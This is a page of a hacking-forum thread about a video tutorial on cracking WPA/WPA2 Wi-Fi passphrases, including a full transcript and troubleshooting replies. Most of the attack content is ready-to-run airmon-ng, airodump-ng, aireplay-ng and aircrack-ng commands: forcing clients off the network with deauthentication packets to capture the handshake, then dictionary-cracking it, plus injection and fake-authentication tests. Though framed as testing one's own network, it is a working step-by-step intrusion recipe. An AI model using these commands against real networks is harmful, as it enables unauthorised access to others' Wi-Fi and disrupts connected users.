Page 5 of 36 FirstFirst ... 3456715 ... LastLast
Results 41 to 50 of 359

Thread: -=Xploitz=- VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"

  1. #41
    Junior Member
    Join Date
    Aug 2007
    Posts
    29

    Smile Transcript of Xploitz WPA Cracking Tut #3

    Here is my submission of Xploitz WPA cracking vid #3.

    I was to lazy to re-type all of it so I took some screenshots during the video, printed them, and then used an OCR program to create the txt file.
    Enjoy.

  2. #42
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default Revised transcript

    Quote Originally Posted by {In}Secure View Post
    Here is my submission of Xploitz WPA cracking vid #3.

    I was to lazy to re-type all of it so I took some screenshots during the video, printed them, and then used an OCR program to create the txt file.
    Enjoy.

    Nice. Thanks for taking the time to do that. There were a few errors within the transcript. Mainly because the OCR program that was used mixed up the number 1 with the letter l..and vice versa..and the number 0 for a Q like ath0 was turned into athQ. I however demand accuracy with my tutorials...

    So here is my edited and revised copy of this transcript, not for download..but for online viewing. Feel free though to copy and paste it to Windows notepad or Linuxs' KWrite. Thanks again {In}Secure for posting.



    Code:
    -=Xploitz=- E-Z Video Tutorial: Cracking WPA/WPA2
    Date of video:  August 09,   2007
    
        
    Hello everyone,   : )
    
    Welcome once again to another great  E-Z VIDEO Tutorial taught
     to you by your newly appointed  remote-exploit.org Moderator,
     me....-=Xploitz=-
    
    This time were gonna step it up a little bit and try our hand at our
    WPA/WPA2 TKIP or TKIP+AES network, Whats the difference 
    between cracking a WPA network -VS- a WPA2 network??
    Answer. , .ABSOLUTELY NOTHING!! There is no difference between
    cracking WPA or WPA2 networks at all. In order to SUCCESSFULLY
    crack any WPA/WPA2 network, there are 2 main key things that
    must happen. (1) YOU MUST CAPTURE THE FULL 4 WAY
    HANDSHAKE!! AIRODUMP-NG WILL LET YOU KNOW BY TELLING
    YOU. IF YOU LOOK AT THE TOP RIGHT HAND CORNER OF YOUR
    AIRODUMP-NG SCREEN IT WILL REGISTER AND LET YOU KNOW BY
    SAYING " [ WPA handshake: 00:18:F8;B5:F2:D6] (2) YOUR
    PASSPHRASE MUST BE IN THE DICTIONARY YOU CHOSE IN 
    ORDER TO SUCCESSFULLY BRUTE FORCE IT WITH AIRCRACK-NG.
    
    ***SPECIAL NOTE!!!*** 
    IF YOUR NETWORK IS ENCRYPTED WITH WPA/WPA2 +AES.....
    COWPATTY WILL NOT WORK. COWPATTY ONLY WORKS 
    WITH TKIP.Thats why I'm using aircrack-ng to crack my 
    WPA2/TKIP+AES network, NOW THAT THATS BEEN SAID,
    ...LETS BEGIN SHALL WE??
    
    
    First off, we're gonna put our interface into monitor mode.
    To accomplish this we type in...
    
    airmon-ng stop <device>
    
    My device is Atheros chipped so it would like,.,
    
    airmon-ng stop ath0
    
    Next, we type in,
    
    airmon-ng start <device>,
    
    Again, my card is an Atheros chipped card so I'll use ath0 to
    place my ath0 interface into monitor mode, Other devices
    may only be required to use eth0, wlan0 etc... So for mine its. . .
    
    airmon-ng start ath0
    
    Start airodump-ng to collect the authentication handshake.
     If you don't  know your networks details, just type  in...,
    
    airodump-ng <device> 
    
    mine will look like... 
    airodump-ng ath0
    
    After you run airodump and you see your network and 
    its connected client(s),
    
    press ^c   (Thats Ctrl  c) 
    
     This action will  break you out of airodumps process and 
    give you a new command line.  Use this when you want to
     switch back and fourth to copy and paste your networks details.
    
    Now, open a new shell window and fill in all your networks
    info so that we can focus on only your network and lock
    onto it,  To do this you'll type...
    
    airodump-ng -c (Channel  your AP is on) -w (file name) --bssid (your APS bssid here) <device>
    
    Mine looks like...
    
    airodump-ng -c 6 -w psk --bssid 00:18:F8:B5:F2;D6 ath0
    
    ***Important***Do NOT use the --ivs option. 
     You must capture the full packets!
    
    
    Use Aireplay-ng to de-authenticate the wireless client
    
    To accomplish this we type in...
    
    aireplay-ng -0 1 -a <AP MAC> -c <Clients MAC> <Device>.
    
    Mine looks like this...
        
    aireplay-ng -0 1 -a 00:18:F8:B5:F2:D6 -c 08:14:A5:F6:83:E3 ath0
    
    You'll know your attack was successful!, if your 
    airodump-ng screen looks similar to this,..
    
    CH 6 H Elapsed: 2 mins ][-08-08 14:37][ WPA handshake 00:18:F8:B5:F2:D6]
    
    BSSID            PWR RXO    Beacons    #Data    #/s    CH    MB    ENC CIPHER AUTM ESSID
    
    E0:18:F8:B5:F2:D6      68    1298    645    3      6     48    WPA2 CCMP  PSK     XploitZ
    
    BSSID            STATION            PWR    Rate Lost Packets Probes
    
    00:18:F8:B5:F2:D6     08:14:A5:F6:83:E3      56     54-54  0    1019
    
    
    Notice the *[ WPA handshake: 00:18:F8:B5:F2:D6] in the upper
     part of the above text?? This confirms that you have captured 
    the complete 4 way handshake, ;)
    
    ***IMPORTANT NOTE!!***
    If there is not a client connected, and you suspect there
     is one connected,.just type in 
    
    aireplay-ng -0 1 -a <BSSID> <Device> 
    
    And they'll appear if their connected!
    
    
    OPEN A NEW SHELL
    
    Run aircrack-ng to crack the pre-shared key,
    To do this we type in the command...,
    
    aircrack-ng -w password.lst -b <AP's BSSID HERE> filename.cap
    
    Mine looks like this,..
    
    aircrack-ng -w algae.txt -b 00:18:F8:B5:F2:D6 psk*.cap
    
      You can use .txt or .lst dictionaries. It doesn't matter which
    type of dictionary you use. Just make sure if your dictionary is
    called passwords.lst, you type in passwords.lst and not .txt. 
    Also, your pass-phrase MUST BE IN THE DICTIONARY FOR
    THIS ATTACK TO WORK!! Also please note that my dictionary
    is located in my home folder or /root directory, therefore there is
    no need to type in the full path to my dictionary;} There are 
    other methods including the use of a pre-compiled list of 
    passwords with your ESSID, but this particular tutorial will NOT 
    cover it. I will do another video explaining step by step all the 
    correct processes you need to build a database and pre-compile
     it with your ESSID and password list in the very near future.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  3. #43
    Junior Member
    Join Date
    Jun 2007
    Posts
    29

    Default

    It's ok

    card : Alfa AWUS036H
    chipset : rtl8187

    Unplug alpha
    BootVMware
    Code:
    cd rtl8187_linux_26.1010.0622.2006
    sh wlan0up
    plug alpha
    Code:
    sh wlan0up
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0 1
    airodump-ng -c 1 -w psk --bssid [BSSID_AP] wlan0
    New shell
    Code:
    aireplay-ng -0 1 -a [BSSID_AP] -c [BSSID_CLIENT] wlan0
    Sending DeAuth to station -- STMAC : [[BSSID_CLIENT]]

    but no handshake

    PWR : about 50
    CH : 1
    ENC : WPA
    CLIPHER : TKIP
    AUTH : PSK
    ESSID : AOLbox***

  4. #44
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    try doing -0 5 instead of -0 1 in your deauth command. Your close to the AP and the client correct? You MUST BE CLOSE TO BOTH..not just the AP..its different than in cracking WEP... where you only need to be close to the AP.

    BTW...why are you using macchanger for WPA/WPA2??? Its not needed since your not using your card to connect or associate/authenticate with the AP.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  5. #45
    Junior Member
    Join Date
    Jun 2007
    Posts
    29

    Default

    I reach 60 at the maximum PWR for the AP
    I reach 35 at the maximum PWR for the CLIENT

    If i use an other card on windows XP and i try to connect to the AP,on VMware I can see an other client (me) with a power -1. But the command
    Code:
    aireplay-ng -0 1 -a [BSSID_AP] -c [MY_BSSID_CLIENT] wlan0
    gives nothing

    I tried -0 0 too

    EDIT : i have already try 1.0-dev but i was farther when i try 1.0-dev
    I will try again

  6. #46
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Have you updated to the most recent version of aircrack??

    svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
    cd aircrack-ng
    make
    make install
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  7. #47
    Junior Member
    Join Date
    Jun 2007
    Posts
    29

    Default

    I tried both version aircrack

    With 1.0dev, instead of

    Code:
    [ WPA handshake 00:18:F8:B5:F2:D6] (in your tuto)
    i can note this message
    Code:
    [ 140bytes keystream :[BSSID_AP]

  8. #48
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Don't use 1.0 dev for this..use my posted svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng

    I say use that because there was an issue with the aircrack-ng dictionary capitals and special letters not working out right..example..my passphrase was -=Xploitz=-...I had -=Xploitz=- in my dictionary...but because of the -==- in my passphrase..aircrack dev 1.0 wouldn't read it right. So please use the above version instead. Don't know if it will fix your problem or not..but its worth a shot.

    Do me a favor..test to see if your on the same channel as the AP. Right before you enter your aireplay-ng -0 1 ..etc...command..do a ifconfig wlan0 and a iwconfig wlan0 to verify your on the same channel. Im starting to run out of solutions to help you. Have you updated your cards drivers as well??

    Try to see if your card is capable of injecting...

    aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 -i wlan0 ath0
    Where:
    • -9 means injection test. Long form is - -test. (Double dash)
    • -e teddy is the network name (SSID). This is optional.
    • -a 00:14:6C:7E:40:80 ath0 is MAC address of the access point (BSSID). This is optional.
    • -i wlan0 is interface name of the second card if you want to determine which attacks your card supports. This is optional.
    • ath0 is the interface name or airserv-ng IP Address plus port number. For example - 127.0.0.1:666. (Mandatory)
    IMPORTANT: You must set your card to the desired channel with airmon-ng prior to running any of the tests.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  9. #49
    Junior Member
    Join Date
    Jun 2007
    Posts
    29

    Default

    First,i think i have already the best version of aircrack.
    Mine is in /modules/aircrack_0.91.lzm
    On the page:
    Code:
    h ttp://forums.remote-exploit.org/showthread.php?t=6784
    i have the version of 25/Jun/2007
    I have to download this version ?:
    Code:
    svn co h ttp://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
    Secondly,i do the test :
    Code:
    airmon-ng star wlan0 1
    aireplay-ng -9 wlan0
    Code:
    00:14:6C:7E:40:80 - chennel 1  - "teddy "
    Ping  : 2ms/25/49
    28/30 93%
    EDIT : I will try the lastest version of my alpha (*Update 26/Jun/2007)

    EDIT2 : I have an interrogation Xploitz.
    When I type
    Code:
    aircrack-ng -w pass psk*.cap
    i can see:
    Code:
    Encryption
    WEP (**IVs)
    But it's a WPA key for airodump-ng. Have you got an explication ?
    thanks

    EDIT3 : so i tryto do
    aireplay-ng -1 1 -e teddy -a [AP_BSSID] -h [CLIENT_BSSID] wlan0
    but, i have something like that :
    8:28:02 Sending Authentication Request
    18:28:02 Authentication successful
    18:28:02 Sending Association Request
    18:28:02 Association successful :-)
    18:28:02 Got a deauthentication packet!
    18:28:05 Sending Authentication Request
    18:28:05 Authentication successful
    18:28:05 Sending Association Request
    18:28:10 Sending Authentication Request
    18:28:10 Authentication successful
    18:28:10 Sending Association Request
    I don't think that is good

    EDIT4 :
    With the latest version for alpha end aircrack 0.9.1svn499 :
    Code:
    aircrack-ng -w pass psk*.cap
    i can see:
    Code:
    Encryption
    WAP (0 handshake)
    it's better than WEP (**IVs)

  10. #50
    Junior Member
    Join Date
    Aug 2007
    Posts
    36

    Default Wow Awesome

    -=Xploitz=-

    WOW, this is a great video. I am a noobie, and for me it was wonderful. very clear and concise.

    The one thing i was a little off about was having to have my WPA Key in the password list. Wouldn't that defeat the purpose of really testing a network? I want to test my network or a clients network but if i already knew their passcode then it is like "cheating"

    have you done a video fo try to crack a WPA without knowing the passcode?

    Either way, your tuts are always very easy for me to follow

    thank you. keep up the awesome work.
    The wise man can pick up a grain of sand and envision a whole universe. But the stupid man will just lay down on some seaweed and roll around until he's completely draped in it. Then he'll stand up and go: Hey, I'm Vine Man.

Page 5 of 36 FirstFirst ... 3456715 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •